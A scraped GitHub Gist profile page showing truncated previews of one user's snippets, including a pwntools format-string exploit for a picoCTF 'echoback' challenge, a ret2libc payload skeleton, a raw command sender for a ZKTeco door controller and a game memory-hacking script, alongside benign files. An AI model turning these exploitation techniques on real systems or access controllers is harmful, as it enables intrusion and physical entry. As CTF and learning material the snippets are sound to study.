Skip to content

Instantly share code, notes, and snippets.

Caio Lüders caioluders

Block or report user

Report or block caioluders

Hide content and notifications from this user.

Learn more about blocking users

Contact Support about this user’s behavior.

Learn more about reporting abuse

Report abuse
View GitHub Profile
View exploit_echoback.py
from pwn import *
#p = process("./echoback")
p = remote("2018shell.picoctf.com",37402)
e = ELF("./echoback")
print p.recv(1024)
payload = fmtstr_payload(7, {e.got["puts"]:0x080485ab,e.got["printf"]:e.plt["system"]} , write_size='byte')
print len(payload)
View unix_commands.txt
2to3-2.7
X11
[
ab
aclocal
aclocal-1.15
addpart
addr2line
appres
apropos
View food
cat=1;food=1;exit=1;{cat,food};{exit,1}
1//1;print(open("food","r").read());"""
var fs = require('fs');fs.readFile('food','utf8',function(err,contents){
console.log(contents)})//"""
View exploit_1.py
from pwn import *
p = process("./examine32")
system = 0xf7e19e70
exit = 0xf7e0cf50
bash = 0xf7f39fcc
offset = ???
exploit = "A"*offset+p32(system)+p32(exit)+p32(bash)+"\xff"
View examine_main.c
int main(int argc, char *argv[]) {
int i;
char s[MAX_CMD_LINE], c;
memset(s, 0, MAX_CMD_LINE);
// Loop until Ctrl+C is pressed
for (i=0; ; i++) {
if ((c = getchar()) == EOF) // End Of File reached when reading from a pipe
break;
View keybase.md

Keybase proof

I hereby claim:

  • I am caioluders on github.
  • I am caioluders (https://keybase.io/caioluders) on keybase.
  • I have a public key whose fingerprint is E36E 7964 0CDF AA23 08E8 CBBB 3B14 CD07 C1DC A57D

To claim this, I am signing this object:

View zk.py
def zk_open_the_fucking_door(self,cmd,ss):
command = cmd
command_string = ss
chksum = 0
session_id = self.session_id
reply_id = unpack('HHHH', self.data_recv[:8])[3]
buf = self.createHeader(command, chksum, session_id,
reply_id, command_string)
self.zkclient.sendto(buf, self.address)
View FTL_script.py
from bitslicer import VirtualMemoryError, DebuggerError
import keycode, keymod
class Script(object):
def __init__(self):
self.currentLifeAddress = None # variable to store where the enemy's life address is
debug.registerHotkey(keycode.A, keymod.CONTROL, self.killShip) # Add a hotkey to call the self.killShip function
debug.addBreakpoint(vm.base() + 0xDC642, self.shipDamaged) # Make a breakpoint every time that mov [rdi+0x70], eax is reached and call self.shipDamaged , vm.base() is the pagination of the memory , this changes every time it loads
def killShip(self,hotkeyID) :
View test.php
<?php print "<?php phpinfo();?>" ;?>
View black_hole.pde
void setup () {
size(500,500) ;
frameRate(300) ;
background(0);
smooth();
}
void draw() {
background(0) ;
for ( int i = 0 ; i < 360 ; i += 1) {
You can’t perform that action at this time.